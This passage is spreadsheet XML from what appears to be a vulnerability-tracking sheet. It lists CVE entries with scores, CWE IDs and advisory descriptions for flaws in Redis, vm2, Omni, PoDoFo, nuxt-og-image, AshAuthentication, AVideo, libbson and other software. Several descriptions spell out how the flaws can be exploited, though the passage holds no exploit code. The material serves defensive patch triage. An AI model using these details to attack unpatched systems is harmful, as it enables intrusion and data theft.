      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Redis community. The cluster bus packet parser, responsible for handling PING, PONG, and MEET packets, fails to properly validate string-carrying extensions for null-termination. This oversight allows a remote attacker to craft a malicious packet, leading to an out-of-bounds read when the packet's payload is processed. Successful exploitation of this vulnerability could result in the disclosure of sensitive information or a remote denial of service (DoS).</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92925</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92959</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 does not fully enforce the allowAsync: false option in VM and NodeVM. While localPromise.prototype.then is replaced with a handler that throws 'Async not available', the sandbox's Promise static methods (Promise.resolve, Promise.all, Promise.race, Promise.any, and Promise.allSettled) still assimilate attacker-supplied thenables: native promise resolution performs PromiseResolveThenableJob and invokes the sandboxed code's then method in a microtask without passing through the patched then, so the async restriction is never applied. As a result, sandboxed script can schedule work that runs after VM.run() or NodeVM.run() has returned and outside the configured timeout, continuing to execute after the host believes execution is complete.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92959</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93014</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>RosarioSIS versions before 12.9 fail to validate the filename request parameter in Users and Students modules, allowing authenticated users to unlink allow-listed files via path traversal. Attackers can use parent-directory sequences to escape upload directories and delete CSS, XML, JSON resources and other users' documents throughout the installation.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93014</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45720</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-367</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.6.6 and from 1.7.0 until 1.7.3, SAML.getSession in internal/pkg/auth/interceptor/saml.go checks SAMLAssertion.Used and marks it used in separate state operations. Concurrent requests carrying the same captured saml-session token can each observe the assertion as unused and obtain authentication as the victim before either update is visible. The attacker can invoke SAML-protected gRPC endpoints, use ConfirmPublicKey to create multiple persistent credentials tied to the victim, and generate audit entries attributed to the victim, with the resulting access potentially affecting confidentiality, integrity, and availability according to the victim's privileges. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45720</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93015</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-787</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>BlueKitchen BTstack through 1.8.2 fails to validate the peer-reported endpoint count against table bounds in A2DP stream endpoint discovery. A bonded peer can send an AVDTP DISCOVER response with more endpoints than the fixed table holds, causing out-of-bounds writes that corrupt adjacent static objects and crash the process or sever event delivery.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93015</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54633</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>PoDoFo is a C++17 PDF manipulation library. From version 1.0.0 until 1.1.1, processing a crafted PDF with an Indexed color-space image can cause a heap out-of-bounds read in PdfColorSpaceFilterIndexed::FetchScanLine in src/podofo/main/PdfColorSpaceFilter.cpp. PODOFO_INVARIANT does not perform a runtime check, so a pixel index greater than or equal to m_MapSize can address beyond m_lookup. PdfColorSpaceFilterFactory::TryCreateFromObject also validates hival with an incorrect conjunction and no upper bound, allowing malformed Indexed color-space metadata outside the expected range. The resulting read can disclose adjacent heap data or crash the processing application. This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54633</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61793</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt-og-image</t>
        </is>
      </c>
      <c r="M242" s="5" t="inlineStr">
        <is>
          <t>6.7.0</t>
        </is>
      </c>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-20, CWE-441, CWE-749, CWE-918</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>Nuxt OG Image generates OG Images with Vue templates in Nuxt. From 6.0.2 until 6.7.0, nuxt-og-image exposes the unauthenticated /_og/d/** route when the documented defaults security.strict = false and security.secret = "" are used, and base64url-decodes the fonts parameter through decodeOgImageParams. Attacker-controlled fonts[].path values flow through loadDefinedFonts into the font-assets/node.js binding, which performs a server-side fetch without validating the URL scheme, origin, resolved address, or redirects. This permits blind requests to loopback, private, link-local, cloud metadata, and other internal HTTP services, while differences in the outer response status and timing can reveal service reachability. Slow targets can also occupy OG image render workers for the configured fetch and render timeouts. This issue is fixed in version 6.7.0.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61793</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78223</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Cryptographic Signature vulnerability in team-alembic AshAuthentication allows a caller of the token revocation action to neutralise a revocation or write arbitrary rows into the token resource.
AshAuthentication.TokenResource.RevokeTokenChange.change/3 reads the :token argument and decodes it with AshAuthentication.Jwt.peek/1, which delegates to Joken.peek_claims/1 and performs no signature check, unlike Jwt.verify/4. The jti, exp and sub claims it returns are written straight onto the revocation record, guarded only by byte_size(token) &gt; 0. Because expires_at derives from the attacker-chosen exp, a forged copy of a genuine token that keeps the real jti but backdates exp yields a revocation row that is already expired: expunge_expired removes it and the genuine token passes revoked? again. Arbitrary jti and sub values can be inserted the same way.
This issue affects ash_authentication: from 0.2.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78223</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89038</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Verizon Cloud for Android (com.vcast.mediamanager) before 26.7.10 contains a path traversal vulnerability that allows co-resident malicious applications to write attacker-controlled bytes outside the intended staging directory by supplying a crafted _display_name value containing path-traversal sequences through exported activities OneTouchUploadActivity and PrintShopCloudActivity. Attackers can exploit the unsanitized filename concatenation in the file-staging sink via ACTION_SEND or ACTION_SEND_MULTIPLE intents to achieve arbitrary file write and inject attacker-controlled content into the authenticated user's Verizon Cloud account without user interaction.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89038</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92915</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit e01e41ecc (no patched version available) contains a broken access control flaw in objects/userVerifyEmail.php. The script disables the login requirement ($global['ignoreUserMustBeLoggedIn'] = 1), takes users_id directly from the query string, and calls User::sendVerificationLink() with no session requirement, no CSRF/global token, no relationship check between caller and target, and no enforceRateLimit() call. The only intended throttle is keyed to the caller's own session, so cookie-less requests are never limited. An unauthenticated remote attacker can therefore cause an arbitrary number of verification emails to be sent to any account ID, and can enumerate accounts and their verification status from the three distinct JSON responses ("Verification Sent", "Already verified", "Unknown error"). In addition, createVerificationCode() invokes $user-&gt;setRecoverPass() and saves the user, so each anonymous request writes a live password-recovery token onto the targeted account; that token is embedded in base64 in the verification link emailed to the account owner and is accepted by objects/userRecoverPassSave.json.php as the credential for setting a new password.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92915</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92936</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.0 through 3.11.6 leak absolute host filesystem paths to sandboxed code through error stack formatting. Attacker-supplied code can force the host-realm source transformer to throw a SyntaxError (for example by calling eval with malformed source) and then read the error's .stack property; the bridge forwards the .stack read to the host-realm formatter, bypassing the sandbox-side host-path redaction introduced for GHSA-v27g-jcqj-v8rw. The returned stack string discloses absolute paths from vm2, Node.js internals, and the embedding application's own source tree, along with host function names. Default new VM() and new NodeVM() configurations are affected without any special options, and the issue persists when string eval is disabled because the host-side transformer throws before eval is handled. The impact is information disclosure only; no code execution results. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92936</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93395</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>A missing lower-bound validation in the bson_new_from_buffer() function of libbson allows an integer underflow when processing BSON data with a zero-length prefix. The function reads a 32-bit document length from the input buffer but does not verify that the value is at least 5 (the minimum valid BSON document size) before using it in an array index calculation. When the length field is zero, the expression used to check the document's null terminator wraps to UINT32_MAX, causing a heap out-of-bounds read that crashes the process. An unauthorized party who can supply crafted BSON input to an application using this API can cause a denial of service.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93395</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81447</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Information disclosure and Information tampering.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81447</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85717</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M249" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.14.5 to 2.16.0 and from 3.0.9 to 3.0.11, a client configured with a client-wide Realm and redirect following can disclose credentials after a cross-origin redirect because the Interceptors authentication path falls back to the client configuration after redirect handling clears the per-exchange realm. If the attacker-controlled target returns 401, the client can send Basic or Digest credentials or a Negotiate or NTLM token to that origin. Per-request realms are stripped correctly, and this issue is a residual bypass of the earlier cross-origin credential-stripping fixes. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85717</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86788</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
